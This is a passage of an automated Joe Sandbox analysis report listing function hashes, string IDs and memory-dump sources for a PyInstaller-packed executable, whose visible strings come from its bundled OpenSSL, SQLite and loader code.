                                                                                                                                                                                                                                                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                                                                                        • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 44c63cebad8f291ccd3b0504a1ed5e2fc3168f2a865abfc5fe4a7bbc9c259f30
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB517021A2DA6291FF609B2DE8552BE63A2EF94780F4444B1EF4EC26D5FE3CE5058740
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5687553188da95979e1850d39e0540597c2748fb5fd92a7858fdb41ee8a10d46
                                                                                                                                                                                                                                                                                                                        • Instruction ID: dd905067492a88bd85427228c1cedd38a612935110789a2ef753ec50ea3772f5
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5687553188da95979e1850d39e0540597c2748fb5fd92a7858fdb41ee8a10d46
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6451B021B08B6792EE109B59D8401BD6392BF80794F8446B2EF0CC77E6EF3CE5958300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007B6570
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
                                                                                                                                                                                                                                                                                                                        • API String ID: 4069847057-1099454403
                                                                                                                                                                                                                                                                                                                        • Opcode ID: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ce4cddf05b97dc1ef2f57b020408366fd35645082145d65fef6fa922e7069eac
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F41A231B08A0396F7188B51E870B7833A4FB44B94F8145B6EA2E837D9DF2DE595C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • 00007FFE13343010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFB0FB1C3
                                                                                                                                                                                                                                                                                                                        • 00007FFE13343010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFB0FB2A4
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-875588658
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2f58605a80ece0dbe873986359c22506b80aa05e97296c1e5264f92375f5e100
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5bbb42e45e47f0f788376f955e8009fa88919fcb1a0769f4dbfc3839eda98a70
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f58605a80ece0dbe873986359c22506b80aa05e97296c1e5264f92375f5e100
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50E16F76F0A69389FB21CB64D460BBC2BA0EB06748F444135DE2E56AEDDF3CA445DB40
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        • cannot add a STORED column, xrefs: 00007FFDFB117A72
                                                                                                                                                                                                                                                                                                                        • Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFDFB1178ED
                                                                                                                                                                                                                                                                                                                        • SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFDFB117C5C
                                                                                                                                                                                                                                                                                                                        • Cannot add a column with non-constant default, xrefs: 00007FFDFB117969
                                                                                                                                                                                                                                                                                                                        • Cannot add a PRIMARY KEY column, xrefs: 00007FFDFB117881
                                                                                                                                                                                                                                                                                                                        • UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFDFB117B14
                                                                                                                                                                                                                                                                                                                        • Cannot add a UNIQUE column, xrefs: 00007FFDFB11789C
                                                                                                                                                                                                                                                                                                                        • SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFDFB1178F7, 00007FFDFB117973, 00007FFDFB117A81
                                                                                                                                                                                                                                                                                                                        • Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFDFB11790F
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-200680935
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1b11e0b50b6f3011658864684eda2090ea5d92b4248e7ec2ea4e07d8665c16e4
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15E18EA2B0AA8395EB258B15E164BB927A5FB44B88F145135DE6D077EEDF3CE448C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
                                                                                                                                                                                                                                                                                                                        • API String ID: 3568877910-1794268454
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
                                                                                                                                                                                                                                                                                                                        • Instruction ID: a86e59c7eb4f1034104054a7054be78871c8166e42ff57dfb8bedf1f13c6144b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66918422B1AFC281FB9DDB25D460BB83390EF44B44F585675DE7C0B299DF28E5958320
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                                                                                        • String ID: P%
                                                                                                                                                                                                                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1bbb9a030e9cd5e1b7226f60d0ce1c917b999c91af7ede5880acc2d63f03158f
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E51D626608BB186D6249F26E4581BAB7A1F798B62F004135EFDEC3694EF3CD085DB10
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                                                                                        • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                                                                                        • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                                                                                        • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ab9ab2aeca0955af9e50b44400376c0dd281076800e2608d19f9f39d0c93aeae
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57215E21B09B9282EB458F7EEC54179A255EF89B91F5842B1DF2DC33D8EE2CD9918301
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254958100.00007FFDFA931000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFA930000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254926278.00007FFDFA930000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA97A000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA988000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9D7000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9DC000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9DF000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255290926.00007FFDFA9E0000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255326893.00007FFDFA9E2000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfa930000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 190073905-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2076e6fe45f1a4881743f9dd02842a537207f6e1e2323fc88133d1ff2ddfcb21
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C818020F0C34346FB6C9B659461A7A62B8AF65780FD481B5DA6DC73DEDE3CE8C58600
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 995b986fa2bc530a268c0c6c8c70c7746d8f1f98b51ea4c9cbc478e9120973be
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6412A372E0DA4386FB609A18D1546B97693FB90750FC84275EF99C6AC6DF3CE9C08B04
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                                                                                        • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8c27b6437f13957938516a7d95ec290f834523c6593082ac5e06af5676ee2df1
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91127362E1C94386FB609A18E0547B976A3FB40750FD44277EF9AC6AC8DF7CE5848B10
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-2846519077
                                                                                                                                                                                                                                                                                                                        • Opcode ID: f9b62292e15983dd92f3d336a42f126a0ce1eb18eb7dc8c6fabe0fe700413ad5
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 522cda227e5843009c194cbc66bcfaed5d63b5bc12888e812134ea63d0da0ada
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9b62292e15983dd92f3d336a42f126a0ce1eb18eb7dc8c6fabe0fe700413ad5
